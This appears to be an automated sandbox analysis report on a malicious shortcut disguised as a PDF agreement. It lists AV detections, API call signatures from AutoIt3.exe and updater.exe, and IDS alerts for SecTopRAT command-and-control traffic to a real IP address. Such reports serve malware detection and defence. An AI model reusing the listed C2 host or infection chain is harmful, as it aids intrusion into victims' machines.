                    2024-12-12T08:20:45.794335+010028033053Unknown Traffic192.168.2.549781185.147.124.2369000TCP
                    2024-12-12T08:20:50.750828+010028033053Unknown Traffic192.168.2.549794185.147.124.2369000TCP
                    2024-12-12T08:20:53.841484+010028033053Unknown Traffic192.168.2.549806185.147.124.2369000TCP
                    2024-12-12T08:20:55.373490+010028033053Unknown Traffic192.168.2.549812185.147.124.2369000TCP
                    2024-12-12T08:20:56.921758+010028033053Unknown Traffic192.168.2.549813185.147.124.2369000TCP
                    2024-12-12T08:20:58.648113+010028033053Unknown Traffic192.168.2.549819185.147.124.2369000TCP
                    2024-12-12T08:21:00.196845+010028033053Unknown Traffic192.168.2.549825185.147.124.2369000TCP
                    2024-12-12T08:21:01.738898+010028033053Unknown Traffic192.168.2.549826185.147.124.2369000TCP
                    2024-12-12T08:21:05.072777+010028033053Unknown Traffic192.168.2.549839185.147.124.2369000TCP
                    2024-12-12T08:21:08.181856+010028033053Unknown Traffic192.168.2.549846185.147.124.2369000TCP
                    2024-12-12T08:21:11.256983+010028033053Unknown Traffic192.168.2.549853185.147.124.2369000TCP
                    2024-12-12T08:21:14.351221+010028033053Unknown Traffic192.168.2.549865185.147.124.2369000TCP
                    2024-12-12T08:21:17.430782+010028033053Unknown Traffic192.168.2.549871185.147.124.2369000TCP
                    2024-12-12T08:21:18.975041+010028033053Unknown Traffic192.168.2.549877185.147.124.2369000TCP
                    2024-12-12T08:21:20.497789+010028033053Unknown Traffic192.168.2.549883185.147.124.2369000TCP
                    2024-12-12T08:21:22.029157+010028033053Unknown Traffic192.168.2.549884185.147.124.2369000TCP
                    2024-12-12T08:21:25.107135+010028033053Unknown Traffic192.168.2.549896185.147.124.2369000TCP
                    2024-12-12T08:21:28.179242+010028033053Unknown Traffic192.168.2.549903185.147.124.2369000TCP
                    2024-12-12T08:21:31.365786+010028033053Unknown Traffic192.168.2.549914185.147.124.2369000TCP
                    2024-12-12T08:21:32.899651+010028033053Unknown Traffic192.168.2.549916185.147.124.2369000TCP
                    2024-12-12T08:21:34.444178+010028033053Unknown Traffic192.168.2.549923185.147.124.2369000TCP
                    2024-12-12T08:21:37.640802+010028033053Unknown Traffic192.168.2.549932185.147.124.2369000TCP
                    2024-12-12T08:21:39.199091+010028033053Unknown Traffic192.168.2.549936185.147.124.2369000TCP
                    2024-12-12T08:21:40.733281+010028033053Unknown Traffic192.168.2.549942185.147.124.2369000TCP
                    2024-12-12T08:21:43.795587+010028033053Unknown Traffic192.168.2.549949185.147.124.2369000TCP
                    2024-12-12T08:21:46.947570+010028033053Unknown Traffic192.168.2.549960185.147.124.2369000TCP
                    2024-12-12T08:21:48.485451+010028033053Unknown Traffic192.168.2.549962185.147.124.2369000TCP
                    2024-12-12T08:21:50.014607+010028033053Unknown Traffic192.168.2.549968185.147.124.2369000TCP
                    2024-12-12T08:21:55.256500+010028033053Unknown Traffic192.168.2.549986185.147.124.2369000TCP
                    2024-12-12T08:22:01.411084+010028033053Unknown Traffic192.168.2.550001185.147.124.2369000TCP
                    2024-12-12T08:22:02.949154+010028033053Unknown Traffic192.168.2.550007185.147.124.2369000TCP
                    2024-12-12T08:22:06.190612+010028033053Unknown Traffic192.168.2.550014185.147.124.2369000TCP
                    2024-12-12T08:22:07.745866+010028033053Unknown Traffic192.168.2.550019185.147.124.2369000TCP
                    2024-12-12T08:22:10.857565+010028033053Unknown Traffic192.168.2.550030185.147.124.2369000TCP
                    2024-12-12T08:22:16.992116+010028033053Unknown Traffic192.168.2.550046185.147.124.2369000TCP
                    2024-12-12T08:22:20.060280+010028033053Unknown Traffic192.168.2.550057185.147.124.2369000TCP
                    2024-12-12T08:22:21.592672+010028033053Unknown Traffic192.168.2.550059185.147.124.2369000TCP
                    2024-12-12T08:22:26.243959+010028033053Unknown Traffic192.168.2.550064185.147.124.2369000TCP
                    2024-12-12T08:22:29.361748+010028033053Unknown Traffic192.168.2.550066185.147.124.2369000TCP
                    2024-12-12T08:22:30.897485+010028033053Unknown Traffic192.168.2.550067185.147.124.2369000TCP
                    2024-12-12T08:22:35.537822+010028033053Unknown Traffic192.168.2.550072185.147.124.2369000TCP
                    2024-12-12T08:22:43.217997+010028033053Unknown Traffic192.168.2.550078185.147.124.2369000TCP
                    2024-12-12T08:22:46.319486+010028033053Unknown Traffic192.168.2.550081185.147.124.2369000TCP
                    2024-12-12T08:22:47.857920+010028033053Unknown Traffic192.168.2.550082185.147.124.2369000TCP
                    2024-12-12T08:22:50.920508+010028033053Unknown Traffic192.168.2.550085185.147.124.2369000TCP
                    2024-12-12T08:22:57.554609+010028033053Unknown Traffic192.168.2.550089185.147.124.2369000TCP
                    2024-12-12T08:23:00.636764+010028033053Unknown Traffic192.168.2.550091185.147.124.2369000TCP
                    2024-12-12T08:23:06.834496+010028033053Unknown Traffic192.168.2.550095185.147.124.2369000TCP
                    2024-12-12T08:23:20.873820+010028033053Unknown Traffic192.168.2.550105185.147.124.2369000TCP
                    2024-12-12T08:23:24.030101+010028033053Unknown Traffic192.168.2.550108185.147.124.2369000TCP
                    2024-12-12T08:23:30.175475+010028033053Unknown Traffic192.168.2.550112185.147.124.2369000TCP
                    2024-12-12T08:23:31.734844+010028033053Unknown Traffic192.168.2.550113185.147.124.2369000TCP
                    2024-12-12T08:23:37.872595+010028033053Unknown Traffic192.168.2.550118185.147.124.2369000TCP
                    2024-12-12T08:23:40.959504+010028033053Unknown Traffic192.168.2.550121185.147.124.2369000TCP
                    2024-12-12T08:23:44.039504+010028033053Unknown Traffic192.168.2.550124185.147.124.2369000TCP
                    2024-12-12T08:23:47.144311+010028033053Unknown Traffic192.168.2.550126185.147.124.2369000TCP
                    2024-12-12T08:23:51.732886+010028033053Unknown Traffic192.168.2.550129185.147.124.2369000TCP
                    2024-12-12T08:24:02.490296+010028033053Unknown Traffic192.168.2.550136185.147.124.2369000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-12T08:20:19.206623+010028032742Potentially Bad Traffic192.168.2.549710172.67.223.31443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Agreement for Cooperation.PDF.lnk.download.lnkVirustotal: Detection: 31%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: Agreement for Cooperation.PDF.lnk.download.lnkJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                    Source: unknownHTTPS traffic detected: 172.67.223.31:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.223.31:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: Binary string: wntdll.pdbUGP source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004C4005
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_004CC2FF
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_004C494A
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CCD14 FindFirstFileW,FindClose,11_2_004CCD14
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_004CCD9F
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004CF5D8
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_004CF735
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_004CFA36
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_004C3CE2
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133203D FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,11_2_0133203D
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01332145 FindFirstFileA,GetLastError,11_2_01332145
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0132F96D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,11_2_0132F96D
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_009E4005
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_009EC2FF
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E494A GetFileAttributesW,FindFirstFileW,FindClose,14_2_009E494A
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_009ECD9F
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009ECD14 FindFirstFileW,FindClose,14_2_009ECD14
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_009EF5D8
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_009EF735
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_009EFA36
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_009E3CE2
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_017568AD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,14_2_017568AD
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_017541DD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_017541DD
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_017569B5 FindFirstFileA,GetLastError,14_2_017569B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06FDE345h13_2_06FDDCD6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06FDE345h13_2_06FDE321

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:49716 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:49716
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49730 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49736 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49729 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49743 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49742 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49749 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49761 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49755 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49762 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49768 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49774 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49776 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49781 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49787 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49793 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49800 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49794 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49812 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49806 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49813 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49819 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49825 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49826 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49833 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49839 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49840 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49852 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49846 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49853 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49859 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49865 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49871 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49870 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49877 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49884 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49896 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49890 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49901 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49883 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49909 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:49921 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49914 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49903 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:49921
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49932 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49947 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49936 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49928 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49955 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49942 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49916 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49949 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49923 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49960 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49962 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49968 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:49974 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49975 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49986 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49988 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49993 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49999 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50001 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50007 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:49974
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50012 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49980 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50019 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50025 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50030 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50033 -> 185.147.124.236:15647
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50032 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50039 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50044 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50046 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50052 -> 185.147.124.236:9000
                    Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50057 -> 185.147.124.236:9000
